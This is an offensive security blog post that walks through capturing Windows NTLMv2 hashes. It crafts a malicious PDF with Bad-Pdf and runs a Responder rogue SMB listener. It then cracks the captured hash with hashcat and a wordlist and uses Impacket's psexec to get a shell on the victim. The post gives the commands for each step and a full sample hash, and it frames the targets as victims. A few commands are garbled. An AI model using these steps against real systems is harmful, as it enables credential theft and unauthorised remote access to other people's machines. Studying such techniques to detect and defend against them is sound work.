Power belongs to the people who take it

Stealing Windows NTLM hashes with a malicious PDF

In this post we will see in a practical way how we can steal the NTLM hashes of a Windows target using a malicious PDF.

NTLM

NTLM is a challenge-response authentication protocol that uses three messages to authenticate a client.

  • First of all, the client establishes the connection and sends a NEGOTIATE_MESSAGE.
  • The server then responds with CHALLENGE_MESSAGE that is used to verify the identity of the client.
  • Finally, the client responds to the challenge with a AUTHENTICATE_MESSAGE. That will help the client to authenticate

In the most updated versions used hash is the NTLMV2, wich is version two of the NTLM.
NTLMv2 sends two 8-byte responses to a server challenge (CHALLENGE_MESSAGE). Each response contains a 16-byte HMAC-MD5 hash of the server challenge, a randomly generated client challenge entirely or partially, and a HMAC-MD5 hash with the user’s password other than other identifying information.

You can get the NTLM hashes when you dump the SAM database of any Windows operating system, the database of a domain controller or Mimikatz for example, but when doing this method we only obtain the NET-NTLM so we could not perform an Pass The Hash attack.

PDF generation

For the creation of this PDF use BadPDF, a very simple to use python that will create our PDF and set a responder listener that allows us to capture the hash NTLM of who opens the PDF

git clone https://github.com/deepzec/Bad-Pdf
cd Bad-PDF
Python badpdf.py



We will run the Python script and configure some parameters through some prompts .


Will be set a responder listener. Responder it’s a tool with many features among them is to create a rogue SMB to which our victim will make the request revealing its NTLM hash

Getting the hash

Once the malicious file has been transmitted to our victims, we will be waiting for an execution. When the PDF is executed it will send the request and we will obtain the hash.


Once obtained this hash you could try crack to get the palin password of the user or continue the attack through the relaying technique, if you have that attack vector.

Cracking hash

We will copy the complete hash to a file and through Hashcat we’ll perform a brute force attack. This method may not have a result because the password should be in our dictionary.

echo "Tester::D Desktop-06SOKS7:3a42bbec5ab35438:0BFDA0E2A3BBECF021B9617EEDB8638B: 0 101000000000000C0653150DE09D20121EC78862889D21D000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D004200 33002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D2010600040002000000080030003000000000000000010000000020000060323A9F80A7C436E0304FC289FE850F83CE9F4E5EF8FD2AA555612A3DC648230A001000000000000000000000000000000000000900220063006900660 073002F003100390032002E003100360038002E0031002E0034003200000000000000000000000000"> hash
hashcat -a 0-m 5600 hash/root/Documents/Hacking/Wordlist/rockyou.txt



With this we obtain the password in plain text that is 12345. It’s important to have secure passwords 🙂 . If our victim has SMB and does not have too many security measures we will can obtain shell

python psexec.py Tester:[email protected]

Tools:
BadPDF, Psexec(Impacket), Hashcat

References:

¿Me ayudas a compatirlo?

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

© 2024 ironHackers

Theme by Anders NorenUp ↑